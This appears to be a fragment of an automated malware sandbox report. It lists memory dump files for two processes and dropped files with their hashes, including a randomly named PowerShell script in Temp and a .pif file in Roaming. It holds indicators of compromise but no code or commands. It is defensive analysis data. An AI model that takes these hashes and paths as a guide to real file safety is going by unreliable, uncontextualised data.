memory/3948-575-0x00000000058A0000-0x0000000005906000-memory.dmp
memory/3948-585-0x0000000005A80000-0x0000000005DD4000-memory.dmp
memory/3948-586-0x0000000005ED0000-0x0000000005EEE000-memory.dmp
memory/3948-587-0x0000000005F20000-0x0000000005F6C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\K1HDCVMZ3CHA6WL98LCQ54O6LSAEU.ps1
| MD5 | a93ef812fcdf3af24ff8b33a75d4992e |
| SHA1 | b282892bd321a8709474f43d790d7e661edaa98f |
| SHA256 | d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6 |
| SHA512 | 272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037 |
memory/3948-589-0x0000000007510000-0x0000000007B8A000-memory.dmp
memory/3948-590-0x0000000006420000-0x000000000643A000-memory.dmp
memory/1160-600-0x0000000007A20000-0x0000000007AB6000-memory.dmp
memory/1160-601-0x0000000007980000-0x00000000079A2000-memory.dmp
memory/1160-602-0x0000000008070000-0x0000000008614000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f48374bf42e705689df188bd0e8fa105 |
| SHA1 | 4e46ca4b09158875153f7188acd11f335a891d4f |
| SHA256 | 994544725ccd58a4c4becbddce321d366371e9f1b9d5ddd5c2c4f7b28d0c88af |
| SHA512 | cd87435b528190c27d8010fb0f2b9e797d7f3b0a5a67ad8de8c78c3972d0af002d78fcd75125a379bccbc57889f5903790e97b92ebe1e603c751b4ac4bd46f3b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | def65711d78669d7f8e69313be4acf2e |
| SHA1 | 6522ebf1de09eeb981e270bd95114bc69a49cda6 |
| SHA256 | aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c |
| SHA512 | 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7 |
C:\Users\Admin\AppData\Roaming\0VYTBW.pif
| MD5 | 3f58a517f1f4796225137e7659ad2adb |
| SHA1 | e264ba0e9987b0ad0812e5dd4dd3075531cfe269 |
| SHA256 | 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48 |
| SHA512 | acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634 |
C:\Users\Admin\AppData\Roaming\KHOIE0.vsd
| MD5 | 3c6d0866e54ab391bc09713fde4c9d38 |
| SHA1 | a1a4e9c067e3c85739e85fb45f7ecdb363bcf856 |
| SHA256 | ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682 |
| SHA512 | eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4 |